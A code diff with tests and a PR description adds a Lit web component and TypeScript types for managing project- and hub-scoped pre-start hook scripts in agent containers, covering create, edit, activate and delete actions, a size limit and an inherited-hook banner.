+    expect(text(el)).toContain('Inherited from hub: baseline-setup');
+
+    // Once a project hook is active the banner disappears.
+    el.hooks = [HOOK_ACTIVE, HOOK_ARCHIVED];
+    await el.updateComplete;
+    expect(text(el)).not.toContain('Inherited from hub');
+  });
+
+  it('derives the slug from the name and POSTs to the collection endpoint', async () => {
+    const calls: RecordedCall[] = [];
+    const el = await createComponent([], calls);
+
+    el.openCreateForm();
+    el.onNameInput({ target: { value: 'Install Build Tools!' } } as unknown as Event);
+    expect(el.formSlug).toBe('install-build-tools');
+    el.formScript = '#!/bin/sh\necho hello\n';
+
+    await el.handleSave();
+
+    const post = calls.find((c) => c.method === 'POST');
+    expect(post?.url).toBe('/api/v1/projects/proj-1/pre-start-hooks');
+    expect(post?.body?.name).toBe('Install Build Tools!');
+    expect(post?.body?.slug).toBe('install-build-tools');
+    expect(post?.body?.script).toBe('#!/bin/sh\necho hello\n');
+    // The list is refreshed after a successful save.
+    expect(calls.filter((c) => c.method === 'GET')).toHaveLength(2);
+  });
+
+  it('keeps a hand-edited slug instead of re-deriving it from the name', async () => {
+    const calls: RecordedCall[] = [];
+    const el = await createComponent([], calls);
+
+    el.openCreateForm();
+    el.onNameInput({ target: { value: 'First name' } } as unknown as Event);
+    el.onSlugInput({ target: { value: 'custom-slug' } } as unknown as Event);
+    el.onNameInput({ target: { value: 'Second name' } } as unknown as Event);
+
+    expect(el.formSlug).toBe('custom-slug');
+  });
+
+  it('rejects scripts over 64 KB client-side without calling the API', async () => {
+    const calls: RecordedCall[] = [];
+    const el = await createComponent([], calls);
+
+    el.openCreateForm();
+    el.formName = 'Too big';
+    el.formScript = 'x'.repeat(64 * 1024 + 1);
+
+    await el.handleSave();
+
+    expect(el.formError).toContain('64 KB');
+    expect(calls.some((c) => c.method === 'POST')).toBe(false);
+  });
+
+  it('PUTs updates to the hook id endpoint and does not send the slug', async () => {
+    const calls: RecordedCall[] = [];
+    const el = await createComponent([HOOK_ACTIVE], calls);
+
+    el.openEditForm(HOOK_ACTIVE);
+    el.formName = 'Renamed';
+    await el.handleSave();
+
+    const put = calls.find((c) => c.method === 'PUT');
+    expect(put?.url).toBe('/api/v1/projects/proj-1/pre-start-hooks/hook-1');
+    expect(put?.body?.name).toBe('Renamed');
+    expect(put?.body?.slug).toBeUndefined();
+  });
+
+  it('activates an archived hook via the activate endpoint', async () => {
+    const calls: RecordedCall[] = [];
+    const el = await createComponent([HOOK_ACTIVE, HOOK_ARCHIVED], calls);
+
+    await el.handleActivate(HOOK_ARCHIVED);
+
+    const activate = calls.find((c) => c.url.endsWith('/activate'));
+    expect(activate?.method).toBe('POST');
+    expect(activate?.url).toBe('/api/v1/projects/proj-1/pre-start-hooks/hook-2/activate');
+  });
+
+  it('deletes a hook after confirmation', async () => {
+    const calls: RecordedCall[] = [];
+    const el = await createComponent([HOOK_ACTIVE, HOOK_ARCHIVED], calls);
+    vi.stubGlobal(
+      'confirm',
+      vi.fn(() => true)
+    );
+
+    await el.handleDelete(HOOK_ARCHIVED);
+
+    const del = calls.find((c) => c.method === 'DELETE');
+    expect(del?.url).toBe('/api/v1/projects/proj-1/pre-start-hooks/hook-2');
+  });
+
+  it('does not delete when the confirmation is dismissed', async () => {
+    const calls: RecordedCall[] = [];
+    const el = await createComponent([HOOK_ACTIVE, HOOK_ARCHIVED], calls);
+    vi.stubGlobal(
+      'confirm',
+      vi.fn(() => false)
+    );
+
+    await el.handleDelete(HOOK_ARCHIVED);
+
+    expect(calls.some((c) => c.method === 'DELETE')).toBe(false);
+  });
+
+  it('offers delete for archived hooks and for a lone active hook only', async () => {
+    const calls: RecordedCall[] = [];
+    const el = await createComponent([HOOK_ACTIVE, HOOK_ARCHIVED], calls);
+
+    // Active hook alongside others: the hub rejects the delete, so hide it.
+    expect(el.canDelete(HOOK_ACTIVE)).toBe(false);
+    expect(el.canDelete(HOOK_ARCHIVED)).toBe(true);
+
+    el.hooks = [HOOK_ACTIVE];
+    expect(el.canDelete(HOOK_ACTIVE)).toBe(true);
+  });
+
+  it('hides mutating affordances in readonly mode', async () => {
+    const calls: RecordedCall[] = [];
+    const el = await createComponent([HOOK_ACTIVE, HOOK_ARCHIVED], calls);
+
+    // Sanity check: the editable rendering does expose these controls.
+    const editableLabels = Array.from(
+      (el.shadowRoot as ShadowRoot).querySelectorAll('sl-icon-button')
+    ).map((b) => (b as Element).getAttribute('label'));
+    expect(editableLabels).toContain('Edit');
+    expect(editableLabels).toContain('Activate');
+
+    el.readonly = true;
+    await el.updateComplete;
+
+    const shadow = el.shadowRoot as ShadowRoot;
+    const labels = Array.from(shadow.querySelectorAll('sl-icon-button')).map((b) =>
+      (b as Element).getAttribute('label')
+    );
+    expect(labels).not.toContain('Edit');
+    expect(labels).not.toContain('Activate');
+    expect(labels).not.toContain('Delete');
+    expect(shadow.textContent).not.toContain('Create Hook');
+    // The script can still be inspected read-only.
+    expect(labels).toContain('View script');
+  });
+
+  it('surfaces a load failure with a retry affordance', async () => {
+    vi.stubGlobal(
+      'fetch',
+      vi.fn(() => Promise.resolve(new Response('boom', { status: 500 })))
+    );
+    const el = document.createElement('scion-pre-start-hook-list') as any;
+    el.setAttribute('apiBasePath', '/api/v1');
+    document.body.appendChild(el);
+    await el.updateComplete;
+    await new Promise((r) => setTimeout(r, 50));
+    await el.updateComplete;
+
+    expect(el.error).toBeTruthy();
+    expect(text(el)).toContain('Failed to Load');
+  });
+});

--- a/web/src/components/shared/pre-start-hook-list.ts
+++ b/web/src/components/shared/pre-start-hook-list.ts
@@ -1,0 +1,736 @@
+/**
+ * Copyright 2026 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+/**
+ * Pre-Start Hook List Component
+ *
+ * Self-contained list + CRUD component for pre-start hooks. Pre-start hooks are
+ * not file-based resources, so `scion-resource-list` does not apply; this
+ * component follows the `scion-env-var-list` / `scion-injected-skills-panel`
+ * patterns instead (own loading state, inline expand, inline create/edit form).
+ *
+ * The same component serves both scopes — only `apiBasePath` differs:
+ *   project → /api/v1/projects/{projectId}/pre-start-hooks
+ *   hub     → /api/v1/pre-start-hooks
+ *
+ * Exactly one hook is active per scope. Creating a new hook (or activating an
+ * archived one) automatically archives the previous active hook, so there is no
+ * standalone "archive" action — the hub API does not expose one.
+ */
+
+import { LitElement, html, css, nothing, type PropertyValues } from 'lit';
+import { customElement, property, state } from 'lit/decorators.js';
+
+import type { PreStartHook, PreStartHookSummary } from '../../shared/types.js';
+import { apiFetch, extractApiError } from '../../client/api.js';
+import { resourceStyles } from './resource-styles.js';
+
+/** Maximum script size accepted by the hub API (64 KB). */
+const SCRIPT_MAX_BYTES = 64 * 1024;
+
+/** Default script body pre-filled into the create form. */
+const DEFAULT_SCRIPT =
+  '#!/bin/sh\nset -eu\n\n# Runs inside the agent container before the harness starts.\n';
+
+/** Mirrors api.Slugify closely enough for client-side preview. */
+function slugify(text: string): string {
+  return text
+    .toLowerCase()
+    .trim()
+    .replace(/[^a-z0-9]+/g, '-')
+    .replace(/^-+|-+$/g, '');
+}
+
+/** Byte length of a UTF-8 string (script limits are byte-based, not char-based). */
+function byteLength(text: string): number {
+  return new TextEncoder().encode(text).length;
+}
+
+@customElement('scion-pre-start-hook-list')
+export class ScionPreStartHookList extends LitElement {
+  /**
+   * API base path — `/api/v1/projects/{id}` for project scope,
+   * `/api/v1` for hub scope.
+   */
+  @property({ type: String }) apiBasePath = '';
+
+  /** When true, no create/edit/activate/delete affordances are shown. */
+  @property({ type: Boolean }) readonly = false;
+
+  /**
+   * Hub-level fallback hook shown as an inherited indicator. Only relevant at
+   * project scope. The banner is displayed when this is set and the project has
+   * no active hook of its own; it disappears once a project hook is activated.
+   * The parent page fetches this — the component never calls the hub endpoint.
+   */
+  @property({ type: Object }) inheritedHook: PreStartHookSummary | null = null;
+
+  @state() private loading = true;
+  @state() private hooks: PreStartHook[] = [];
+  @state() private error: string | null = null;
+
+  /** Row whose script is expanded inline. */
+  @state() private expandedId: string | null = null;
+
+  /** Row with an action (activate/delete) in flight. */
+  @state() private busyId: string | null = null;
+
+  // Inline create/edit form state.
+  @state() private formOpen = false;
+  @state() private formMode: 'create' | 'edit' = 'create';
+  @state() private formHookId: string | null = null;
+  @state() private formName = '';
+  @state() private formSlug = '';
+  @state() private formDescription = '';
+  @state() private formScript = '';
+  @state() private formSaving = false;
+  @state() private formError: string | null = null;
+
+  /** True once the user edits the slug by hand — stops name-derived updates. */
+  private slugTouched = false;
+
+  /** apiBasePath the current list was loaded from (guards redundant fetches). */
+  private loadedPath: string | null = null;
+
+  static override styles = [
+    resourceStyles,
+    css`
+      .list-header {
+        display: flex;
+        justify-content: flex-end;
+        margin-bottom: 1rem;
+      }
+
+      .inherited-banner {
+        display: flex;
+        align-items: flex-start;
+        gap: 0.625rem;
+        padding: 0.75rem 1rem;
+        margin-bottom: 1rem;
+        border: 1px dashed var(--scion-border, #e2e8f0);
+        border-radius: var(--scion-radius, 0.5rem);
+        background: var(--scion-bg-subtle, #f1f5f9);
+        color: var(--scion-text-muted, #64748b);
+        font-size: 0.875rem;
+      }
+
+      .inherited-banner sl-icon {
+        flex-shrink: 0;
+        margin-top: 0.125rem;
+        font-size: 1rem;
+      }
+
+      .inherited-banner .inherited-title {
+        font-weight: 600;
+        color: var(--scion-text, #1e293b);
+      }
+
+      .inherited-banner .inherited-help {
+        margin-top: 0.125rem;
+      }
+
+      .hook-name {
+        font-weight: 600;
+        font-size: 0.875rem;
+        color: var(--scion-text, #1e293b);
+      }
+
+      .hook-description {
+        font-size: 0.75rem;
+        color: var(--scion-text-muted, #64748b);
+        margin-top: 0.125rem;
+        max-width: 22rem;
+        overflow: hidden;
+        text-overflow: ellipsis;
+        white-space: nowrap;
+      }
+
+      .badge.status-active {
+        background: var(--sl-color-success-100, #dcfce7);
+        color: var(--sl-color-success-700, #15803d);
+      }
+
+      .badge.status-archived {
+        background: var(--scion-bg-subtle, #f1f5f9);
+        color: var(--scion-text-muted, #64748b);
+        border: 1px solid var(--scion-border, #e2e8f0);
+      }
+
+      .script-row td {
+        background: var(--scion-bg-subtle, #f1f5f9);
+      }
+
+      .script-preview {
+        margin: 0;
+        padding: 0.75rem;
+        max-height: 20rem;
+        overflow: auto;
+        font-family: var(--scion-font-mono, monospace);
+        font-size: 0.75rem;
+        line-height: 1.5;
+        white-space: pre;
+        color: var(--scion-text, #1e293b);
+        background: var(--scion-surface, #ffffff);
+        border: 1px solid var(--scion-border, #e2e8f0);
+        border-radius: var(--scion-radius, 0.5rem);
+      }
+
+      .inline-form {
+        border: 1px solid var(--scion-border, #e2e8f0);
+        border-radius: var(--scion-radius-lg, 0.75rem);
+        background: var(--scion-surface, #ffffff);
+        padding: 1.25rem;
+        margin-bottom: 1rem;
+        display: flex;
+        flex-direction: column;
+        gap: 1rem;
+      }
+
+      .inline-form h3 {
+        font-size: 1rem;
+        font-weight: 600;
+        color: var(--scion-text, #1e293b);
+        margin: 0;
+      }
+
+      .form-row {
+        display: grid;
+        grid-template-columns: 1fr 1fr;
+        gap: 1rem;
+      }
+
+      .script-field sl-textarea::part(textarea) {
+        font-family: var(--scion-font-mono, monospace);
+        font-size: 0.8125rem;
+        line-height: 1.5;
+      }
+
+      .script-meta {
+        display: flex;
+        justify-content: space-between;
+        align-items: center;
+        gap: 0.5rem;
+        font-size: 0.75rem;
+        color: var(--scion-text-muted, #64748b);
+        margin-top: 0.25rem;
+      }
+
+      .script-meta.over-limit {
+        color: var(--sl-color-danger-600, #dc2626);
+        font-weight: 600;
+      }
+
+      .form-actions {
+        display: flex;
+        justify-content: flex-end;
+        gap: 0.5rem;
+      }
+
+      @media (max-width: 768px) {
+        .form-row {
+          grid-template-columns: 1fr;
+        }
+      }
+    `,
+  ];
+
+  override connectedCallback(): void {
+    super.connectedCallback();
+    if (this.apiBasePath) {
+      void this.load();
+    }
+  }
+
+  override willUpdate(changed: PropertyValues): void {
+    // The base path is supplied by the parent page and can change (e.g. when the
+    // project id resolves after the first render). Reload when it does. Doing
+    // this in willUpdate keeps the resulting state change inside the same
+    // update cycle instead of scheduling an extra one.
+    if (changed.has('apiBasePath') && this.apiBasePath && this.apiBasePath !== this.loadedPath) {
+      void this.load();
+    }
+  }
+
+  /** Collection endpoint for the current scope. */
+  private get hooksUrl(): string {
+    return `${this.apiBasePath}/pre-start-hooks`;
+  }
+
+  /** True when the current scope already has an active hook. */
+  private get hasActiveHook(): boolean {
+    return this.hooks.some((h) => h.status === 'active');
+  }
+
+  /** Reloads the hook list. Public so parent pages can refresh it. */
+  async load(): Promise<void> {
+    if (!this.apiBasePath) return;
+    const path = this.apiBasePath;
+    this.loadedPath = path;
+    this.loading = true;
+    this.error = null;
+
+    try {
+      const response = await apiFetch(`${path}/pre-start-hooks`);
+      if (!response.ok) {
+        throw new Error(
+          await extractApiError(response, `HTTP ${response.status}: ${response.statusText}`)
+        );
+      }
+      const data = (await response.json()) as { hooks?: PreStartHook[] } | PreStartHook[];
+      const hooks = Array.isArray(data) ? data : data.hooks || [];
+      // Ignore a response for a base path we have since navigated away from.
+      if (this.loadedPath !== path) return;
+      this.hooks = hooks;
+    } catch (err) {
+      console.error('Failed to load pre-start hooks:', err);
+      if (this.loadedPath !== path) return;
+      this.error = err instanceof Error ? err.message : 'Failed to load pre-start hooks';
+    } finally {
+      if (this.loadedPath === path) {
+        this.loading = false;
+      }
+    }
+  }
+
+  // ── Form handling ────────────────────────────────────────────────────
+
+  private openCreateForm(): void {
+    this.formMode = 'create';
+    this.formHookId = null;
+    this.formName = '';
+    this.formSlug = '';
+    this.formDescription = '';
+    this.formScript = DEFAULT_SCRIPT;
+    this.formError = null;
+    this.slugTouched = false;
+    this.formOpen = true;
+  }
+
+  private openEditForm(hook: PreStartHook): void {
+    this.formMode = 'edit';
+    this.formHookId = hook.id;
+    this.formName = hook.name;
+    this.formSlug = hook.slug;
+    this.formDescription = hook.description || '';
+    this.formScript = hook.script || '';
+    this.formError = null;
+    this.slugTouched = true;
+    this.formOpen = true;
+  }
+
+  private closeForm(): void {
+    this.formOpen = false;
+    this.formError = null;
+  }
+
+  private onNameInput(e: Event): void {
+    this.formName = (e.target as HTMLInputElement).value;
+    // The slug is derived from the name until the user edits it directly.
+    if (this.formMode === 'create' && !this.slugTouched) {
+      this.formSlug = slugify(this.formName);
+    }
+  }
+
+  private onSlugInput(e: Event): void {
+    this.slugTouched = true;
+    this.formSlug = (e.target as HTMLInputElement).value;
+  }
+
+  private async handleSave(e?: Event): Promise<void> {
+    e?.preventDefault();
+
+    const name = this.formName.trim();
+    if (!name) {
+      this.formError = 'Name is required';
+      return;
+    }
+    if (!this.formScript.trim()) {
+      this.formError = 'Script is required';
+      return;
+    }
+    // Mirror the hub-side 64 KB limit so the user gets immediate feedback.
+    if (byteLength(this.formScript) > SCRIPT_MAX_BYTES) {
+      this.formError = 'Script exceeds the 64 KB size limit';
+      return;
+    }
+
+    this.formSaving = true;
+    this.formError = null;
+
+    try {
+      const isCreate = this.formMode === 'create';
+      const url = isCreate
+        ? this.hooksUrl
+        : `${this.hooksUrl}/${encodeURIComponent(this.formHookId!)}`;
+      // Slug is immutable after creation — the update endpoint ignores it.
+      const body = isCreate
+        ? {
+            name,
+            slug: this.formSlug.trim() || undefined,
+            description: this.formDescription.trim() || undefined,
+            script: this.formScript,
+          }
+        : {
+            name,
+            description: this.formDescription.trim(),
+            script: this.formScript,
+          };
+
+      const response = await apiFetch(url, {
+        method: isCreate ? 'POST' : 'PUT',
+        headers: { 'Content-Type': 'application/json' },
+        body: JSON.stringify(body),
+      });
+      if (!response.ok) {
+        throw new Error(
+          await extractApiError(response, `HTTP ${response.status}: ${response.statusText}`)
+        );
+      }
+
+      this.closeForm();
+      await this.load();
+    } catch (err) {
+      console.error('Failed to save pre-start hook:', err);
+      this.formError = err instanceof Error ? err.message : 'Failed to save pre-start hook';
+    } finally {
+      this.formSaving = false;
+    }
+  }
+
+  // ── Row actions ──────────────────────────────────────────────────────
+
+  private async handleActivate(hook: PreStartHook): Promise<void> {
+    this.busyId = hook.id;
+    try {
+      const response = await apiFetch(`${this.hooksUrl}/${encodeURIComponent(hook.id)}/activate`, {
+        method: 'POST',
+      });
+      if (!response.ok) {
+        throw new Error(
+          await extractApiError(response, `Failed to activate (HTTP ${response.status})`)
+        );
+      }
+      await this.load();
+    } catch (err) {
+      console.error('Failed to activate pre-start hook:', err);
+      alert(err instanceof Error ? err.message : 'Failed to activate pre-start hook');
+    } finally {
+      this.busyId = null;
+    }
+  }
+
+  private async handleDelete(hook: PreStartHook): Promise<void> {
+    if (!confirm(`Delete pre-start hook "${hook.name}"? This cannot be undone.`)) {
+      return;
+    }
+    this.busyId = hook.id;
+    try {
+      const response = await apiFetch(`${this.hooksUrl}/${encodeURIComponent(hook.id)}`, {
+        method: 'DELETE',
+      });
+      if (!response.ok && response.status !== 204) {
+        throw new Error(
+          await extractApiError(response, `Failed to delete (HTTP ${response.status})`)
+        );
+      }
+      if (this.expandedId === hook.id) this.expandedId = null;
+      await this.load();
+    } catch (err) {
+      console.error('Failed to delete pre-start hook:', err);
+      alert(err instanceof Error ? err.message : 'Failed to delete pre-start hook');
+    } finally {
+      this.busyId = null;
+    }
+  }
+
+  /**
+   * A hook can be deleted when it is archived, or when it is the only hook in
+   * the scope (the hub rejects deleting an active hook while others exist).
+   */
+  private canDelete(hook: PreStartHook): boolean {
+    return hook.status !== 'active' || this.hooks.length === 1;
+  }
+
+  private formatDate(value: string | undefined): string {
+    if (!value) return '—';
+    const date = new Date(value);
+    if (isNaN(date.getTime())) return value;
+    return date.toLocaleDateString(undefined, { year: 'numeric', month: 'short', day: 'numeric' });
+  }
+
+  // ── Rendering ────────────────────────────────────────────────────────
+
+  override render() {
+    if (this.loading) {
+      return html`
+        <div class="loading-state">
+          <sl-spinner></sl-spinner>
+          <p>Loading pre-start hooks...</p>
+        </div>
+      `;
+    }
+
+    if (this.error) {
+      return html`
+        <div class="error-state">
+          <sl-icon name="exclamation-triangle"></sl-icon>
+          <h2>Failed to Load</h2>
+          <p>There was a problem loading pre-start hooks.</p>
+          <div class="error-details">${this.error}</div>
+          <sl-button variant="primary" @click=${() => this.load()}>
+            <sl-icon slot="prefix" name="arrow-clockwise"></sl-icon>
+            Retry
+          </sl-button>
+        </div>
+      `;
+    }
+
+    return html`
+      ${this.renderInheritedBanner()}
+      ${!this.readonly && !this.formOpen
+        ? html`
+            <div class="list-header">
+              <sl-button variant="primary" size="small" @click=${this.openCreateForm}>
+                <sl-icon slot="prefix" name="plus-lg"></sl-icon>
+                Create Hook
+              </sl-button>
+            </div>
+          `
+        : nothing}
+      ${this.formOpen ? this.renderForm() : nothing}
+      ${this.hooks.length === 0 ? this.renderEmpty() : this.renderTable()}
+    `;
+  }
+
+  private renderInheritedBanner() {
+    if (!this.inheritedHook || this.hasActiveHook) return nothing;
+    return html`
+      <div class="inherited-banner">
+        <sl-icon name="diagram-3"></sl-icon>
+        <div>
+          <div class="inherited-title">Inherited from hub: ${this.inheritedHook.name}</div>
+          <div class="inherited-help">
+            This hub-default script runs before agents in this project start, because no project
+            hook is active. Activating a project hook overrides it.
+          </div>
+        </div>
+      </div>
+    `;
+  }
+
+  private renderEmpty() {
+    return html`
+      <div class="empty-state">
+        <sl-icon name="terminal"></sl-icon>
+        <h3>No Pre-Start Hooks</h3>
+        <p>
+          Pre-start hooks are shell scripts staged into the agent container and run before the
+          harness starts.
+        </p>
+        ${!this.readonly && !this.formOpen
+          ? html`
+              <sl-button variant="primary" size="small" @click=${this.openCreateForm}>
+                <sl-icon slot="prefix" name="plus-lg"></sl-icon>
+                Create Hook
+              </sl-button>
+            `
+          : nothing}
+      </div>
+    `;
+  }
+
+  private renderTable() {
+    return html`
+      <div class="table-container">
+        <table>
+          <thead>
+            <tr>
+              <th>Name</th>
+              <th>Slug</th>
+              <th>Status</th>
+              <th class="hide-mobile">Created</th>
+              <th class="actions-cell"></th>
+            </tr>
+          </thead>
+          <tbody>
+            ${this.hooks.map((hook) => this.renderRow(hook))}
+          </tbody>
+        </table>
+      </div>
+    `;
+  }
+
+  private renderRow(hook: PreStartHook) {
+    const busy = this.busyId === hook.id;
+    const expanded = this.expandedId === hook.id;
+    const isActive = hook.status === 'active';
+
+    return html`
+      <tr>
+        <td>
+          <div class="hook-name">${hook.name}</div>
+          ${hook.description
+            ? html`<div class="hook-description">${hook.description}</div>`
+            : nothing}
+        </td>
+        <td class="key-cell">${hook.slug}</td>
+        <td>
+          <span class="badge ${isActive ? 'status-active' : 'status-archived'}">
+            ${isActive ? 'active' : hook.status || 'archived'}
+          </span>
+        </td>
+        <td class="hide-mobile"><span class="meta-text">${this.formatDate(hook.created)}</span></td>
+        <td class="actions-cell">
+          <sl-icon-button
+            name=${expanded ? 'chevron-up' : 'code-slash'}
+            label=${expanded ? 'Hide script' : 'View script'}
+            @click=${() => {
+              this.expandedId = expanded ? null : hook.id;
+            }}
+          ></sl-icon-button>
+          ${this.readonly
+            ? nothing
+            : html`
+                <sl-icon-button
+                  name="pencil"
+                  label="Edit"
+                  ?disabled=${busy}
+                  @click=${() => this.openEditForm(hook)}
+                ></sl-icon-button>
+                ${isActive
+                  ? nothing
+                  : html`
+                      <sl-icon-button
+                        name="play-circle"
+                        label="Activate"
+                        ?disabled=${busy}
+                        @click=${() => this.handleActivate(hook)}
+                      ></sl-icon-button>
+                    `}
+                ${this.canDelete(hook)
+                  ? html`
+                      <sl-icon-button
+                        name="trash"
+                        label="Delete"
+                        ?disabled=${busy}
+                        @click=${() => this.handleDelete(hook)}
+                      ></sl-icon-button>
+                    `
+                  : nothing}
+              `}
+        </td>
+      </tr>
+      ${expanded
+        ? html`
+            <tr class="script-row">
+              <td colspan="5"><pre class="script-preview">${hook.script || ''}</pre></td>
+            </tr>
+          `
+        : nothing}
+    `;
+  }
+
+  private renderForm() {
+    const isCreate = this.formMode === 'create';
+    const scriptBytes = byteLength(this.formScript);
+    const overLimit = scriptBytes > SCRIPT_MAX_BYTES;
+
+    return html`
+      <form class="inline-form" @submit=${this.handleSave}>
+        <h3>${isCreate ? 'Create Pre-Start Hook' : 'Edit Pre-Start Hook'}</h3>
+
+        <div class="form-row">
+          <sl-input
+            label="Name"
+            placeholder="e.g. Install build tools"
+            value=${this.formName}
+            @sl-input=${this.onNameInput}
+            required
+          ></sl-input>
+          <sl-input
+            label="Slug"
+            placeholder="auto-derived from name"
+            value=${this.formSlug}
+            ?disabled=${!isCreate}
+            help-text=${isCreate
+              ? 'Auto-derived from the name; edit to override.'
+              : 'Slug cannot be changed.'}
+            @sl-input=${this.onSlugInput}
+          ></sl-input>
+        </div>
+
+        <sl-input
+          label="Description"
+          placeholder="Optional description"
+          value=${this.formDescription}
+          @sl-input=${(e: Event) => {
+            this.formDescription = (e.target as HTMLInputElement).value;
+          }}
+        ></sl-input>
+
+        <div class="script-field">
+          <sl-textarea
+            label="Script"
+            rows="10"
+            resize="vertical"
+            spellcheck="false"
+            value=${this.formScript}
+            @sl-input=${(e: Event) => {
+              this.formScript = (e.target as HTMLTextAreaElement).value;
+            }}
+            required
+          ></sl-textarea>
+          <div class="script-meta ${overLimit ? 'over-limit' : ''}">
+            <span>Runs inside the agent container before the harness starts.</span>
+            <span
+              >${scriptBytes.toLocaleString()} / ${SCRIPT_MAX_BYTES.toLocaleString()} bytes</span
+            >
+          </div>
+        </div>
+
+        ${isCreate
+          ? html`
+              <div class="dialog-hint">
+                <sl-icon name="info-circle"></sl-icon>
+                <span>Creating a hook makes it active and archives the current active hook.</span>
+              </div>
+            `
+          : nothing}
+        ${this.formError ? html`<div class="dialog-error">${this.formError}</div>` : nothing}
+
+        <div class="form-actions">
+          <sl-button variant="default" ?disabled=${this.formSaving} @click=${this.closeForm}>
+            Cancel
+          </sl-button>
+          <sl-button
+            variant="primary"
+            ?loading=${this.formSaving}
+            ?disabled=${this.formSaving || overLimit}
+            @click=${this.handleSave}
+          >
+            ${isCreate ? 'Create' : 'Save'}
+          </sl-button>
+        </div>
+      </form>
+    `;
+  }
+}
+
+declare global {
+  interface HTMLElementTagNameMap {
+    'scion-pre-start-hook-list': ScionPreStartHookList;
+  }
+}

--- a/web/src/components/shared/pre-start-hook-list.ts
+++ b/web/src/components/shared/pre-start-hook-list.ts
@@ -433,7 +433,13 @@ export class ScionPreStartHookList extends LitElement {
   }
 
   private async handleDelete(hook: PreStartHook): Promise<void> {
-    if (!confirm(`Delete pre-start hook "${hook.name}"? This cannot be undone.`)) {
+    // Deletion is not retroactive: the script is baked into each agent's
+    // applied configuration at creation time, so existing agents keep running
+    // it on every restart until they are recreated.
+    const message =
+      `Delete pre-start hook "${hook.name}"? This cannot be undone. ` +
+      'Existing agents that inherited this hook will continue to run it until recreated.';
+    if (!confirm(message)) {
       return;
     }
     this.busyId = hook.id;

--- a/web/src/shared/types.ts
+++ b/web/src/shared/types.ts
@@ -904,3 +904,30 @@ export interface Policy {
   updated: string;
   createdBy?: string;
 }
+
+/**
+ * Minimal pre-start hook fields used by the inherited-hub indicator.
+ */
+export interface PreStartHookSummary {
+  id: string;
+  name: string;
+  slug: string;
+  scope: 'project' | 'hub';
+  status: string;
+}
+
+/**
+ * Pre-start hook from the Hub API (project- or hub-scoped).
+ * Mirrors the Go `store.ProjectPreStartHook` struct.
+ */
+export interface PreStartHook extends PreStartHookSummary {
+  /** Empty for hub-scoped hooks. */
+  projectId?: string;
+  description?: string;
+  /** Raw script content. Bounded to 64 KB by the Hub API. */
+  script: string;
+  createdBy?: string;
+  updatedBy?: string;
+  created: string;
+  updated: string;
+}


### PR DESCRIPTION
Extends the shipped project-scoped pre-start hook feature (PR #879) with hub-level scope, web UI, and CLI management.

- Schema: adds a scope field (project|hub) to ProjectPreStartHook; project_id optional for hub rows. AutoMigrate-safe, existing rows backfill to project.
- Execution model: one hook runs per agent. Project hook overrides hub hook (fallback only on ErrNotFound, never transient errors).
- Hub API: GET/POST /api/v1/pre-start-hooks + update/delete/activate. GET open to any authenticated user, mutations require hub admin (requireHubAdmin rejects scoped CI tokens).
- Web UI: new scion-pre-start-hook-list component, surfaced as a Pre-Start Hooks tab on the Hub Resources page and in Project Settings, with an inherited-from-hub banner.
- CLI: scion hub hook list/create/show/update/activate/delete.

DEPENDS ON PR #879 (scion/lifecycle-hooks-dev) - extends the entity introduced there, must merge after it.

Test plan: 80+ new tests - store CRUD/atomicity, hub API handlers (auth, size limits, scope isolation), stamping fallback (all 6 ordering cases + error path), web component (13 tests), migration test, UAT scope-confinement regression tests. Independent reviewer approved, all findings addressed